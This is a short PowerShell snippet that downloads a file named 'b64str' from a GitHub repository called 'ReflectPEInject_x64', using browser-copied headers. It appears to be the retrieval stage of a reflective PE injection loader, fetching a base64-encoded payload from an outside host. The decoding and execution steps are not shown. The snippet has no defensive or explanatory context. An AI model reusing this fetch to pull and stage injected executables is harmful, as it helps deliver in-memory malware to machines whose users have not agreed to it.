$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
Invoke-WebRequest -UseBasicParsing -Uri "https://raw.githubusercontent.com/caonima12345-creator/ReflectPEInject_x64/refs/heads/main/b64str" `
-WebSession $session `
-Headers @{
"authority"="raw.githubusercontent.com"
  "method"="GET"
  "path"="/caonima12345-creator/ReflectPEInject_x64/refs/heads/main/b64str"
  "scheme"="https"
  "accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  "accept-encoding"="gzip, deflate, br, zstd"
  "accept-language"="zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6"
  "cache-control"="max-age=0"
  "if-none-match"="W/`"4d729e3dc9a678df663409443c364c6c65175a80d5c2a8adcd7cd58f778f3a3f`""
  "priority"="u=0, i"
  "sec-ch-ua"="`"Chromium`";v=`"130`", `"Microsoft Edge`";v=`"130`", `"Not?A_Brand`";v=`"99`""
  "sec-ch-ua-mobile"="?0"
  "sec-ch-ua-platform"="`"Windows`""
  "sec-fetch-dest"="document"
  "sec-fetch-mode"="navigate"
  "sec-fetch-site"="none"
  "sec-fetch-user"="?1"
  "upgrade-insecure-requests"="1"
}
